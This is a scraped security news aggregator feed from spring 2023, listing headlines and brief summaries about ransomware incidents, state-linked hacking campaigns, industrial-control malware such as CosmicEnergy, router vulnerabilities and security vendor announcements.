      VMware issued multiple security patches today to address critical and high-severity vulnerabilities in VMware Aria Operations for Networks, allowing attackers to gain remote execution or access sensitive information. [...]



      Academics, media, and think tanks warned of North Korean hacking campaign

      industry
      2023-06-06 https://www.bitdefender.com/blog/hotforsecurity/academics-media-and-think-tanks-warned-of-north-korean-hacking-campaign/
      North Korean state-sponsored hackers are targeting think tanks, research centres, media organisations, and academics in the United States and South Korea to gather intelligence. Read more in my article on the Hot for Security blog.

      Autosummary: This initial contact may present itself as an attempt to solicit response to an inquiry related to foreign policy, conduct a survey, request an interview, ask the recipient for a resume or to review a document, or offer payment for authoring a research paper.


      New "PowerDrop" PowerShell malware targets U.S. aerospace industry

      exploits industry
      2023-06-06 https://www.bleepingcomputer.com/news/security/new-powerdrop-powershell-malware-targets-us-aerospace-industry/
      A new PowerShell malware script named "PowerDrop" has been discovered to be used in attacks targeting the U.S. aerospace defense industry. [...]

      Autosummary: Executing the decrypted command (Adlumin). Next, PowerDrop sends the results of the command execution back to the C2 server, and if they are too large, it splits them into 128-byte chunks transmitted in a stream of multiple messages.


      Brics ministers call for rebalancing of global order away from West

      industry
      2023-06-02 https://www.bbc.co.uk/news/world-africa-65784030?at_medium=RSS&at_campaign=KARANGA
      The talks attended by Russia in South Africa are clouded by allegations of war crimes in Ukraine.



      North Korea's Kimsuky Group Mimics Key Figures in Targeted Cyber Attacks

      industry
      2023-06-02 https://thehackernews.com/2023/06/north-koreas-kimsuky-group-mimics-key.html
      U.S. and South Korean intelligence agencies have issued a new alert warning of North Korean cyber actors' use of social engineering tactics to strike think tanks, academia, and news media sectors. The "sustained information gathering efforts" have been attributed to a state-sponsored cluster dubbed Kimsuky, which is also known by the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (

      Autosummary: The "sustained information gathering efforts" have been attributed to a state-sponsored cluster dubbed Kimsuky, which is also known by the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima.


      iPhone in India: Foxconn to manufacture smartphones in Karnataka by April 2024

      industry
      2023-06-02 https://www.bbc.co.uk/news/world-asia-india-65784719?at_medium=RSS&at_campaign=KARANGA
      Apple's decision to manufacture iPhones in India aims at diversifying away from China



      Digi International updates SkyCloud features for industrial monitoring and control solutions

      industry
      2023-06-02 https://www.helpnetsecurity.com/2023/06/02/digi-skycloud/

      Digi International has released the latest version of Digi SkyCloud, a solution for monitoring, analyzing and controlling field data. The 23.5 update of SkyCloud introduces a range of new features, giving users effortless systems integrations with remote monitoring and control solutions — delivering flexibility and optimal efficiency, making it ideal for industrial, agricultural and environmental industries. Company administrators can now better manage their deployment and user base. At the forefront of this release are the … More



      Galvanick raises $10 million for its industrial cybersecurity platform

      industry ciber
      2023-06-02 https://www.helpnetsecurity.com/2023/06/02/galvanick-seed-round/

      Galvanick announced its $10 million seed round. Major investors included MaC Venture Capital, Founders Fund, Village Global, Countdown Capital, Hanover Technology Investment Management, Shrug Capital, 8090 Industries, and over 25 angel investors specializing in cybersecurity, manufacturing, finance, and defense. Galvanick plans to use the capital to make additional core hires, and expand use of its initial product – an Extended Detection & Response (XDR) platform – to additional advanced manufacturing and critical infrastructure facilities. Galvanick …

      The post Galvanick raises $10 million for its industrial cybersecurity platform appeared first on Help Net Security.

      Autosummary: Major investors included MaC Venture Capital, Founders Fund, Village Global, Countdown Capital, Hanover Technology Investment Management, Shrug Capital, 8090 Industries, and over 25 angel investors specializing in cybersecurity, manufacturing, finance, and defense.


      Phishing campaigns thrive as evasive tactics outsmart conventional detection

      financial industry
      2023-06-01 https://www.helpnetsecurity.com/2023/06/01/advanced-detection-evasion-techniques/

      A 25% increase in the use of phishing kits has been recorded in 2022, according to Group-IB. The key phishing trends observed are the increasing use of access control and advanced detection evasion techniques. The rise in evasive tactics, such as antibot techniques and randomization, poses a significant challenge for conventional detection systems and extends the lifespan of phishing campaigns. 3,677 unique phishing kits in 2022 have been identified, 25% more than in 2021. A …

      The post Phishing campaigns thrive as evasive tactics outsmart conventional detection appeared first on Help Net Security.

      Autosummary: For example, in 2022, approximately 1,500 phishing kits contained the functionality for transferring stolen data either via Telegram, email or by writing the data to a file locally on the server, which indicates their growing sophistication. Notably, in 2022, Group-IB researchers observed a 40% increase in the use of anti-bot technologies designed to prevent automated cybersecurity scanners from identifying phishing content.


      Improved BlackCat Ransomware Strikes with Lightning Speed and Stealthy Tactics

      exploits ransomware industry
      2023-06-01 https://thehackernews.com/2023/06/improved-blackcat-ransomware-strikes.html
      The threat actors behind BlackCat ransomware have come up with an improved variant that prioritizes speed and stealth in an attempt to bypass security guardrails and achieve their goals. The new version, dubbed Sphynx and announced in February 2023, packs a "number of updated capabilities that strengthen the group's efforts to evade detection," IBM Security X-Force said in a new analysis. The

      Autosummary: Sphynx also incorporates a loader to decrypt the ransomware payload that, upon execution, performs network discovery activities to hunt for additional systems, deletes volume shadow copies, encrypts files, and finally drops the ransom note.


      Secureworks strengthens industrial cybersecurity with two new offerings

      industry ciber
      2023-06-01 https://www.helpnetsecurity.com/2023/06/01/secureworks-taegis-managedxdr/

      Secureworks has launched two new offerings to unify the way industrial organizations prevent, detect, and respond to threats across the OT and IT landscapes. The convergence of OT and IT in the industrial sector brings technological and economic benefits, but also increases risk. The more OT systems are digitally connected, the larger the overall attack surface becomes, making OT an increasingly attractive target for threat actors. This, combined with a global cybersecurity talent shortage numbering …

      The post Secureworks strengthens industrial cybersecurity with two new offerings appeared first on Help Net Security.

      Autosummary: The solution includes: 24×7 threat monitoring with unlimited access to security experts in 90 seconds or less, collaborative design of OT and IT response processes, customizable rules and playbooks, quarterly expert security reviews, monthly threat hunting, onboarding support, and access to proactive services (including incident response planning and adversarial testing). “Their risks include unplanned shutdowns, financial losses, and harm to human populations that rely on critical services,” said Kyle Falkenhagen, CPO, Secureworks.


      Nozomi and Cynalytica team to deliver security solutions to OT & IoT environments

      industry
      2023-06-01 https://www.helpnetsecurity.com/2023/06/01/nozomi-and-cynalytica-team-to-deliver-security-solutions-to-ot-iot-environments/

      Nozomi Networks and Cynalytica have unveiled they have partnered to provide a visibility, monitoring and threat detection solution that encompasses both TCP/IP-based and non-IP based serial bus and analog connections found in OT and IoT environments. The joint solution simplifies the challenge of addressing security across modernized and legacy systems, and converges security monitoring across an unlimited number of facilities and systems to a central location. “The current cybersecurity challenges and gaps faced by ICS/SCADA …

      The post Nozomi and Cynalytica team to deliver security solutions to OT & IoT environments appeared first on Help Net Security.


      Smashing Security podcast #324: .ZIP domains, AI lies, and did social media inflame a riot?

      industry
      2023-05-31 https://grahamcluley.com/smashing-security-podcast-324/
      ChatGPT hallucinations cause turbulence in court, a riot in Wales may have been ignited on social media, and do you think .MOV is a good top-level domain for "a website that moves you"? All this and much much more is discussed in the latest edition of the "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Mark Stockley. Plus don't miss our featured interview with David Ahn of Centripetal.

      Autosummary: Hosts: Graham Cluley (@gcluley), Carole Theriault (@caroletheriault). Guest: Mark Stockley (@markstockley). Sponsored by: Bitwarden – Password security you can trust.


      Top public cloud security concerns for the media and entertainment industry

      industry
      2023-05-29 https://www.helpnetsecurity.com/2023/05/29/media-and-entertainment-ndustry-cloud-storage/

      Media and entertainment (M&E) companies are rapidly turning to cloud storage in efforts to upgrade their security measures, according to Wasabi. Survey findings highlighted that, while M&E organizations are still relatively new to cloud storage (69% of respondents had been using cloud storage for three years or less), public cloud storage use is on the rise, with 89% of respondents looking to increase (74%) or maintain (15%) their cloud services. Balancing budgets, security, and data loss …

      The post Top public cloud security concerns for the media and entertainment industry appeared first on Help Net Security.

      Autosummary: The top three biggest security concerns M&E organizations have with public cloud include: lack of native security services (42%); lack of native backup, disaster and data protection tools and services (39%); and lack of experience with cloud platform or adequate security training (38%). “Organizations in the media and entertainment industry are flocking to cloud storage as their digital assets need to be stored securely, cost-effectively and accessed quickly,” said Whit Jackson, VP of Media and Entertainment at Wasabi.


      Industrial automation giant ABB disclosed data breach after ransomware attack

      financial exploits ransomware industry
      2023-05-28 https://securityaffairs.com/146752/cyber-crime/abb-ransomware-attack.html

      Swiss electrification and automation technology giant ABB confirmed it has suffered a data breach after a ransomware attack. ABB has more than 105,000 employees and has $29.4 billion in revenue for 2022. On May 7, 2023, the Swiss multinational company, leading electrification and automation technology provider, suffered a cyber attack that reportedly impacted its business operations. […]

      The post Industrial automation giant ABB disclosed data breach after ransomware attack appeared first on Security Affairs.



      New COSMICENERGY Malware Exploits ICS Protocol to Sabotage Power Grids

      exploits industry
      2023-05-26 https://thehackernews.com/2023/05/new-cosmicenergy-malware-exploits-ics.html
      A new strain of malicious software that's engineered to penetrate and disrupt critical systems in industrial environments has been unearthed. Google-owned threat intelligence firm Mandiant dubbed the malware COSMICENERGY, adding it was uploaded to a public malware scanning utility in December 2021 by a submitter in Russia. There is no evidence that it has been put to use in the wild. "The

      Autosummary: "The malware is designed to cause electric power disruption by interacting with IEC 60870-5-104 (IEC-104) devices, such as remote terminal units (RTUs), that are commonly leveraged in electric transmission and distribution operations in Europe, the Middle East, and Asia," the company said.


      New CosmicEnergy ICS malware threatens energy grid assets

      exploits industry
      2023-05-26 https://securityaffairs.com/146675/ics-scada/cosmicenergy-ics-malware.html

      Experts detailed a new piece of malware, named CosmicEnergy, that is linked to Russia and targets industrial control systems (ICS). Researchers from Mandiant discovered a new malware, named CosmicEnergy, designed to target operational technology (OT) / industrial control system (ICS) systems. The malicious code was first uploaded to a public malware scanning service in December 2021 by […]

      The post New CosmicEnergy ICS malware threatens energy grid assets appeared first on Security Affairs.



      Iran-linked Tortoiseshell APT behind watering hole attacks on shipping and logistics Israeli websites

      industry
      2023-05-25 https://securityaffairs.com/146625/apt/iranian-tortoiseshell-israeli-logistics-industry.html

      Iran-linked threat actor Tortoiseshell targeted shipping, logistics, and financial services companies in Israel with watering hole attacks. ClearSky Cyber Security uncovered a watering hole attack on at least eight Israeli websites belonging to shipping, logistics, and financial services companies and attributed them with low confidence to the Iran-linked APT group Tortoiseshell (aka TA456 or Imperial […]

      The post Iran-linked Tortoiseshell APT behind watering hole attacks on shipping and logistics Israeli websites appeared first on Security Affairs.



      Buhti Ransomware Gang Switches Tactics, Utilizes Leaked LockBit and Babuk Code

      exploits ransomware industry
      2023-05-25 https://thehackernews.com/2023/05/buhti-ransomware-gang-switches-tactics.html
      The threat actors behind the nascent Buhti ransomware have eschewed their custom payload in favor of leaked LockBit and Babuk ransomware families to strike Windows and Linux systems. "While the group doesn't develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types," Symantec said in a

      Autosummary: "While the reuse of leaked payloads is often the hallmark of a less-skilled ransomware operation, Blacktail's general competence in carrying out attacks, coupled with its ability to recognize the utility of newly discovered vulnerabilities, suggests that it is not to be underestimated," Symantec said.


      New Russian-linked CosmicEnergy malware targets industrial systems

      exploits industry rusia-ucrania
      2023-05-25 https://www.bleepingcomputer.com/news/security/new-russian-linked-cosmicenergy-malware-targets-industrial-systems/
      Mandiant security researchers have discovered a new malware known as CosmicEnergy that targets operational technology (OT), raising concerns about potential disruptions to electric power systems worldwide. [...]

      Autosummary: The list includes but is not limited to WhisperGate/WhisperKill, FoxBlade (aka HermeticWiper), SonicVote (aka HermeticRansom), CaddyWiper, DesertBlade, Industroyer2, Lasainraw (aka IsaacWiper), and FiberLake (aka DoubleZero).


      Dark Frost Botnet Launches Devastating DDoS Attacks on Gaming Industry

      industry
      2023-05-25 https://thehackernews.com/2023/05/dark-frost-botnet-launches-devastating.html
      A new botnet called Dark Frost has been observed launching distributed denial-of-service (DDoS) attacks against the gaming industry. "The Dark Frost botnet, modeled after Gafgyt, QBot, Mirai, and other malware strains, has expanded to encompass hundreds of compromised devices," Akamai security researcher Allen West said in a new technical analysis shared with The Hacker News. Targets include

      Autosummary: "The Dark Frost botnet, modeled after Gafgyt, QBot, Mirai, and other malware strains, has expanded to encompass hundreds of compromised devices," Akamai security researcher Allen West said in a new technical analysis shared with The Hacker News.


      Iranian Tortoiseshell Hackers Targeting Israeli Logistics Industry

      industry
      2023-05-24 https://thehackernews.com/2023/05/iranian-tortoiseshell-hackers-targeting.html
      At least eight websites associated with shipping, logistics, and financial services companies in Israel were targeted as part of a watering hole attack. Tel Aviv-based cybersecurity company ClearSky attributed the attacks with low confidence to an Iranian threat actor tracked as Tortoiseshell, which is also called Crimson Sandstorm (previously Curium), Imperial Kitten, and TA456. "The infected

      Autosummary: Tel Aviv-based cybersecurity company ClearSky attributed the attacks with low confidence to an Iranian threat actor tracked as Tortoiseshell, which is also called Crimson Sandstorm (previously Curium), Imperial Kitten, and TA456.


      German arms manufacturer Rheinmetall suffered Black Basta ransomware attack

      exploits ransomware industry
      2023-05-23 https://securityaffairs.com/146571/cyber-crime/rheinmetall-black-basta-ransomware-attack.html

      The German automotive and arms manufacturer Rheinmetall announced it was the victim of a Black Basta ransomware attack that took place last month. Rheinmetall is a German automotive and arms manufacturer that is listed on the Frankfurt stock exchange. The company this week announced it was the victim of a ransomware attack conducted by the Black Basta ransomware group. The incident took place […]

      The post German arms manufacturer Rheinmetall suffered Black Basta ransomware attack appeared first on Security Affairs.



      Exploring the tactics of phishing and scam websites in 2023

      financial industry
      2023-05-19 https://www.helpnetsecurity.com/2023/05/19/tactics-phishing-scam-websites-2023-video/

      Phishing scams pose an escalating danger as cybercriminals employ increasingly sophisticated techniques, rendering their detection and prevention more challenging. In this Help Net Security video, Abhilash Garimella, Head of Research at Bolster, talks about the evolution of phishing and scam websites in 2023.

      The post Exploring the tactics of phishing and scam websites in 2023 appeared first on Help Net Security.



      NTT and Cisco help customers transition to IoT-as-a-Service model

      industry
      2023-05-19 https://www.helpnetsecurity.com/2023/05/19/ntt-and-cisco-help-customers-transition-to-iot-as-a-service-model/

      NTT and Cisco have announced a collaboration to develop and deploy joint solutions that empower organizations to improve operational efficiencies and advance sustainability goals. Leveraging NTT’s Edge as a Service portfolio and Cisco’s IoT capabilities, solutions developed by the two companies will offer real-time data insights, enhanced security, improved decision-making, and reduced operational costs through predictive maintenance, asset tracking, and supply chain management capabilities. The companies will deliver solutions that combine NTT’s Managed Services expertise, …

      The post NTT and Cisco help customers transition to IoT-as-a-Service model appeared first on Help Net Security.

      Autosummary: Leveraging NTT’s Edge as a Service portfolio and Cisco’s IoT capabilities, solutions developed by the two companies will offer real-time data insights, enhanced security, improved decision-making, and reduced operational costs through predictive maintenance, asset tracking, and supply chain management capabilities.


      Strata Identity unifies Maverics ID Orchestration functions across environments

      industry
      2023-05-19 https://www.helpnetsecurity.com/2023/05/19/strata-identity-id-orchestration/

      Strata Identity has unveiled the latest version of the Maverics platform that enables customers to unify ID Orchestration functions between legacy on-premises, modern cloud, and multi-vendor environments without rewriting their applications. With Maverics, businesses easily create a vendor-agnostic identity fabric through a visual management interface that supports any identity provider (IDP), including legacy on-premises systems and cloud systems from AWS, Azure, Okta and GCP. According to a Gartner report: “Orchestration through access management can be …

      The post Strata Identity unifies Maverics ID Orchestration functions across environments appeared first on Help Net Security.


      How to Reduce Exposure on the Manufacturing Attack Surface

      industry
      2023-05-18 https://thehackernews.com/2023/05/how-to-reduce-exposure-on-manufacturing.html
      Digitalization initiatives are connecting once-isolated Operational Technology (OT) environments with their Information Technology (IT) counterparts. This digital transformation of the factory floor has accelerated the connection of machinery to digital systems and data. Computer systems for managing and monitoring digital systems and data have been added to the hardware and software used for

      Autosummary: According to Security Scorecard, 48%, nearly half, of the manufacturing companies reviewed scored a C, D, or F in security. In fact, in 2022 alone, there were 2,337 security breaches of manufacturing systems, 338 with confirmed data disclosure (Verizon, 2022 DBIR Report). With minimal set up, requiring no agents or pre-installations, security and IT teams at manufacturing companies can safely challenge their complete attack surface to pinpoint the most damaging security gaps - just like a real-life attacker would. 5 — Benchmark Your Security Posture: By continuously testing your attack surface at regular, frequent intervals, you can continuously benchmark your security posture.


      Critics say £1bn for UK chip industry not enough

      industry
      2023-05-18 https://www.bbc.co.uk/news/technology-65633812?at_medium=RSS&at_campaign=KARANGA
      One CEO says the government's semiconductor strategy does not address the needs of UK chipmakers.


      Monitoring the dark web to identify threats to energy sector organizations

      industry
      2023-05-17 https://securityaffairs.com/146357/deep-web/dark-web-initial-access-energy-sector-orgs.html

      Searchlight Cyber researchers warn of threat actors that are offering on the dark web access to energy sector organizations. Dark web intelligence firm Searchlight Cyber published a report that analyzes how threat actors in the dark web prepare their malicious operations against energy organizations. The threat actors use the hidden part of the web to […]

      The post Monitoring the dark web to identify threats to energy sector organizations appeared first on Security Affairs.


      Autosummary: Threat actors auction initial access to remote software, RDP access, VPNs, and stolen credentials, allowing attackers to use these accesses to establish a foothold in the target organization and launch the attack on both IT and OT infrastructure.


      Multiple flaws in Teltonika industrial cellular router expose OT networks to hack

      industry
      2023-05-17 https://securityaffairs.com/146317/hacking/teltonika-industrial-cellular-routers-flaws.html

      Experts found multiple vulnerabilities in Teltonika industrial cellular routers that could expose OT networks to cyber attacks. A joint analysis conducted by industrial cybersecurity firms Claroty and Otorio discovered multiple flaws in Teltonika Networks’ IIoT products that can expose OT networks to remote attacks. Teltonika Networks is a leading manufacturer of networking solutions, widely adopted […]

      The post Multiple flaws in Teltonika industrial cellular router expose OT networks to hack appeared first on Security Affairs.


      Autosummary: Remote Management System (RMS): versions prior to 4.14.0 (affected by CVE-2023-2586); RUT model routers: version 00.07.00 through 00.07.03.4 (affected by CVE-2023-32349); RUT model routers: version 00.07.00 through 00.07.03 (affected by CVE-2023-32350). “While hundreds of thousands of Teltonika devices are deployed worldwide, a search on internet-scanning engines such as Shodan and Censys also reveals thousands of internet-facing devices, with their management ports externally exposed to the internet,” concludes Otorio.


      Industrial Cellular Routers at Risk: 11 New Vulnerabilities Expose OT Networks

      industry
      2023-05-15 https://thehackernews.com/2023/05/industrial-cellular-routers-at-risk-11.html
      Several security vulnerabilities have been disclosed in cloud management platforms associated with three industrial cellular router vendors that could expose operational technology (OT) networks to external attacks. The findings were presented by Israeli industrial cybersecurity firm OTORIO at the Black Hat Asia 2023 conference last week. "Industrial cellular routers and gateways are essential

      Autosummary: " The six flaws impacting Teltonika Networks RMS – CVE-2023-32346, CVE-2023-32347, CVE-2023-32348, CVE-2023-2586, CVE-2023-2587, and CVE-2023-2588 – were discovered following a "comprehensive research" carried out in collaboration with Claroty. "


      Sponsored Twitter post uses fake BBC News site to boost slippery oil trading app

      industry
      2023-05-12 https://www.malwarebytes.com/blog/news/2023/05/sponsored-twitter-post-goes-forex-trading-with-fake-bbc-site

      Categories: News, Personal

      Tags: forex, BBC, fake, trading, digital, reviews, website, AI, app, phone, twitter, sponsored, ad, advert, blue check, verified

      We take a look at a daisy chain of links and clicks leading from a sponsored Twitter ad to a fake BBC website offering up an AI trading app.

      The post Sponsored Twitter post uses fake BBC News site to boost slippery oil trading app appeared first on Malwarebytes Labs.


      Autosummary: The Tweet reads as follows: “Check out what benefits you can get if you are British”. The Community Notes added to this tweet state: The link, via many redirects, goes to a fake BBC news page promoting an "automated trading platform" scam. If you click it, the site displays the following message: Dear client, In order to deposit funds to your trading account, your account manager will contact you via the phone in the following minutes, please be available to take the call. Plus, we also have the below almost identical review from another user: I have been using [the site] for several years now, and I have never had any issues with withdrawals or deposits. Clicking the link while using a VPN or the TOR browser, which places you outside the UK, results in an “advertorial” for an article promoting a UK-based immigration advice firm. Here’s a particularly odd review, considering the site is just a few months old: “I have been with them for several years now and have never experienced any issues.”


      Surprise! Coldplay lyrics hidden in Kingston SSD firmware

      industry
      2023-05-10 https://www.bleepingcomputer.com/news/technology/surprise-coldplay-lyrics-hidden-in-kingston-ssd-firmware/
      What has firmware got to do with pop rock, you ask? That's the question that crossed a security researcher's mind as he analyzed Kingston's firmware and stumbled upon the lyrics of a popular Coldplay song buried deep within it. [...]

      Autosummary: Kingston's SSD firmware ZIP contents (BleepingComputer) While the contents of the ZIP file hardly raise an eyebrow and contain release notes along with a working firmware (*.bin) file, it's what's inside the ".bin" that you can't unsee: Lyrics of Coldplay's 2002 song The Scientist buried in firmware (BleepingComputer) "I found Coldplay lyrics in SSD controller firmware," Starke told BleepingComputer after analyzing Kingston firmware versioned "SKC2000_S2681103."


      Kingston's SSD firmware has Coldplay lyrics hidden within it

      industry
      2023-05-10 https://www.bleepingcomputer.com/news/technology/kingstons-ssd-firmware-has-coldplay-lyrics-hidden-within-it/
      What has firmware got to do with pop rock, you ask? That's the question that crossed a security researcher's mind as he analyzed Kingston's firmware and stumbled upon the lyrics of a popular Coldplay song buried deep within it. [...]

      Autosummary: Kingston's SSD firmware ZIP contents (BleepingComputer) While the contents of the ZIP file hardly raise an eyebrow and contain release notes along with a working firmware (*.bin) file, it's what's inside the ".bin" that you can't unsee: Lyrics of Coldplay's 2002 song The Scientist buried in firmware (BleepingComputer) "I found Coldplay lyrics in SSD controller firmware," Starke told BleepingComputer after analyzing Kingston firmware versioned "SKC2000_S2681103."


      Renewable energy projects worth billions stuck on hold

      industry
      2023-05-10 https://www.bbc.co.uk/news/science-environment-65500339?at_medium=RSS&at_campaign=KARANGA
      Major UK renewable energy projects being delayed by more than 10 years as grid reaches capacity.


      Lessons from a 40-year-long automotive OEM leader

      industry
      2023-05-08 https://www.helpnetsecurity.com/2023/05/08/paul-cha-lg-podcast/

      Paul Cha is a cyber and product security leader, serving as the VP of Cybersecurity at LG Electronics Vehicle component Solutions. Paul held critical positions at Synopsys, Ford Motor Company, and Samsung before joining LG. He found his way to cybersecurity while working on his Ph.D. in risk management. Paul started his career in cyber security work as a senior security solution development engineer, where he focused on smart appliances such as smart TVs and …

      The post Lessons from a 40-year-long automotive OEM leader appeared first on Help Net Security.

      Autosummary: How struggling tier-one manufacturers can embed better security across their entire lifecycle: As most manufacturers have complicated supply chain requirements and are moving toward software and cloud solutions, it becomes harder to handle complicated security issues. The main challenges faced by the product security industry: The product security industry becomes more difficult as the world becomes more interconnected. As such, product security teams must continuously run TARA activities to enhance the quality of the product’s security.


      Can a wind turbine handle hurricane speed winds?

      industry
      2023-05-08 https://www.bbc.co.uk/news/business-65261147?at_medium=RSS&at_campaign=KARANGA
      As wind farms expand into new areas they will need to withstand extreme wind speeds.


      Dragon Breath APT Group Using Double-Clean-App Technique to Target Gambling Industry

      industry
      2023-05-06 https://thehackernews.com/2023/05/dragon-breath-apt-group-using-double.html
      An advanced persistent threat (APT) actor known as Dragon Breath has been observed adding new layers of complexity to its attacks by adopting a novel DLL side-loading mechanism. "The attack is based on a classic side-loading attack, consisting of a clean application, a malicious loader, and an encrypted payload, with various modifications made to these components over time," Sophos researcher

      Autosummary: The double-dip DLL side-loading strategy, per Sophos, has been leveraged in attacks targeting users in the Philippines, Japan, Taiwan, Singapore, Hong Kong, and China.


      AutoCrypt KEY provides the key management features needed for automotive production

      industry
      2023-05-05 https://www.helpnetsecurity.com/2023/05/05/autocrypt-key/

      AutoCrypt KEY enables OEMs and suppliers to manage all types of cryptographic keys used for the components of connected and electric vehicles. Modern vehicles function through communications, including internal communications between ECUs and application processors, and external connections with nearby vehicles, roadside infrastructure, mobile devices, and charging stations. To ensure that all transmitted data are safely encrypted and all connected components can be securely verified, the use of cryptographic keys is essential in establishing trust …

      The post AutoCrypt KEY provides the key management features needed for automotive production appeared first on Help Net Security.


      New Android Malware "FluHorse" Targeting East Asian Markets with Deceptive Tactics

      exploits industry
      2023-05-05 https://thehackernews.com/2023/05/new-android-malware-fluhorse-targeting.html
      Various sectors in East Asian markets have been subjected to a new email phishing campaign that distributes a previously undocumented strain of Android malware called FluHorse that abuses the Flutter software development framework. "The malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs," Check Point said in "

      Autosummary: "The malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs," Check Point said in a technical report. "


      Patch now! The Mirai IoT botnet is exploiting TP-Link routers

      exploits industry
      2023-05-04 https://www.tripwire.com/state-of-security/patch-now-mirai-iot-botnet-exploiting-tp-link-routers
      Businesses should patch their TP-Link routers as soon as possible, after the revelation that a legendary IoT botnet is targeting them for recruitment. Read more in my article on the Tripwire State of Security blog. "

      Autosummary: "


      Chinese Hacker Group Earth Longzhi Resurfaces with Advanced Malware Tactics

      exploits industry
      2023-05-03 https://thehackernews.com/2023/05/chinese-hacker-group-earth-longzhi.html
      A Chinese state-sponsored hacking outfit has resurfaced with a new campaign targeting government, healthcare, technology, and manufacturing entities based in Taiwan, Thailand, the Philippines, and Fiji after more than six months of no activity. Trend Micro attributed the intrusion set to a cyber espionage group it tracks under the name Earth Longzhi, which is a subgroup within APT41 (aka HOODOO "

      Autosummary: A Chinese state-sponsored hacking outfit has resurfaced with a new campaign targeting government, healthcare, technology, and manufacturing entities based in Taiwan, Thailand, the Philippines, and Fiji after more than six months of no activity. "


      Why the manufacturing sector needs stronger cyber defenses

      industry
      2023-05-02 https://www.helpnetsecurity.com/2023/05/02/manufacturing-sector-cyberattacks/

      In this Help Net Security interview, Filipe Beato, Lead, Centre for Cybersecurity, World Economic Forum, shares his expertise on the correlation between the digitization of the manufacturing sector and the rise in cyberattacks. He delves into the far-reaching impact of cyberattacks on manufacturing companies, their supply chains, and the global economy. Additionally, Beato discusses the unique nature of cyber threats faced by the manufacturing industry and the challenges of implementing effective cybersecurity measures. How has … More

      The post Why the manufacturing sector needs stronger cyber defenses appeared first on Help Net Security.

      "

      Autosummary: It contributes to global circular economies, such as consumer goods, electronics, automotive, energy, pharma, food and beverage, heavy industry and oil and gas. In this Help Net Security interview, Filipe Beato, Lead, Centre for Cybersecurity, World Economic Forum, shares his expertise on the correlation between the digitization of the manufacturing sector and the rise in cyberattacks. Early this year, in January 2023, two new EU directives also entered into force: the NIS2, which replaced the previous directive on security of network and information systems, and the Critical Entities Resilience (CER) directive which repealed a 2008 directive on European critical infrastructure. "


      Vietnamese Threat Actor Infects 500,000 Devices Using "Malverposting" Tactics

      industry
      2023-05-01 https://thehackernews.com/2023/05/vietnamese-threat-actor-infects-500000.html
      A Vietnamese threat actor has been attributed as behind a "malverposting" campaign on social media platforms to infect over 500,000 devices worldwide over the past three months to deliver variants of information stealers such as S1deload Stealer and SYS01stealer. Malverposting refers to the use of promoted social media posts on services like Facebook and Twitter to mass propagate malicious "

      Autosummary: "


      Overcoming industry obstacles for decentralized digital identities

      industry
      2023-04-26 https://www.helpnetsecurity.com/2023/04/26/eve-maler-forgerock-decentralized-digital-identities/

      In this Help Net Security interview, Eve Maler, CTO at ForgeRock, talks about how digital identities continue to play a critical role in how we access online services securely. Maler also highlights the challenges encountered by various industries in implementing decentralized digital identities. What challenges do decentralized digital identity systems face, and how can they be overcome? Decentralized identity is a nascent area, and we’re at an exciting moment in time where decentralized digital identities … More

      The post Overcoming industry obstacles for decentralized digital identities appeared first on Help Net Security.

      "

      Autosummary: People will be able to get a credential one day – and then, the next day or week or year, be able to convincingly tell a service provider that they’ve already been proven to be old enough, or that they have a license to drive, or what have you. One of the strongest examples of implementation of decentralized digital identity systems is the mobile driver’s license (mDL) movement in the US; for context, an mDL is a driver license (or ID card) stored in secure digital form on a mobile device with the capability to be queried in real time in a privacy-sensitive fashion. Third, ensure that the parts of the decentralized identity systems that have to do with security and privacy are robustly implemented, so that the promises made by decentralized identity today can be realized. Digital identity wallets attempt to decentralize identity information, that is, literally to put that data “on the edge” in the form of individuals’ wallets. "


      New coercive tactics used to extort ransomware payments

      exploits ransomware industry
      2023-04-26 https://www.helpnetsecurity.com/2023/04/26/q1-2023-ransomware-victims/

      The increase in reported ransomware victims across Q1 2023 reflects the continued prevalence of ransomware as a worldwide, industry agnostic threat, according to GuidePoint Security. The report is based on data obtained from publicly available resources, including threat groups themselves, and insight into the ransomware threat landscape. In the first quarter, GRIT tracked 849 total publicly posted ransomware victims claimed by 29 different threat groups. Increase in public ransomware victims GRIT’s latest report shows a … More

      The post New coercive tactics used to extort ransomware payments appeared first on Help Net Security.

      "

      Autosummary: While manufacturing and technology continue to be the most impacted sectors, observed victims in the legal industry increased 65% from Q4 2022 to Q1 2023, from 23 to 38, with 70% consistently attributed to the most prolific “double-extortion” model ransomware groups – LockBit, AlphV, Royal, and BlackBasta. "


      NetRise raises $8 million to advance XIoT security technology

      industry
      2023-04-25 https://www.helpnetsecurity.com/2023/04/26/netrise-funding/

      NetRise announced $8 million in funding, led by Squadra Ventures, with participation by existing major investors Miramar Digital Ventures, Sorenson Ventures and DNX Ventures. NetRise has developed a cloud-based SaaS platform that analyzes and continuously monitors the firmware of Extended Internet of Things (XIoT) devices. Leading the market as a software supply chain detection & response platform, NetRise enables device manufacturers and enterprise customers to detect, respond to, and prevent threats throughout their supply chains. … More

      The post NetRise raises $8 million to advance XIoT security technology appeared first on Help Net Security.

      "

      Autosummary: “We have built our platform in such a way that support for automotive, networking equipment, consumer IoT, industrial control systems, and medical device firmware alike are all supported,” said Tom Pace, CEO of NetRise. "


      Cisco fixed critical flaws in the Industrial Network Director and Modeling Labs solutions

      industry
      2023-04-21 https://securityaffairs.com/145108/security/industrial-network-director-and-modeling-labs-critical-flaws.html

      Cisco released security updates to address critical security flaws in its Industrial Network Director and Modeling Labs solutions. Cisco released security updates to address critical security vulnerabilities in the Industrial Network Director and Modeling Labs solutions. An attacker can exploit these vulnerabilities to inject arbitrary operating system commands or access sensitive data. One of the […]

      The post Cisco fixed critical flaws in the Industrial Network Director and Modeling Labs solutions appeared first on Security Affairs.

      "

      Autosummary: "


      Iranian Government-Backed Hackers Targeting U.S. Energy and Transit Systems

      government industry
      2023-04-19 https://thehackernews.com/2023/04/iranian-government-backed-hackers.html
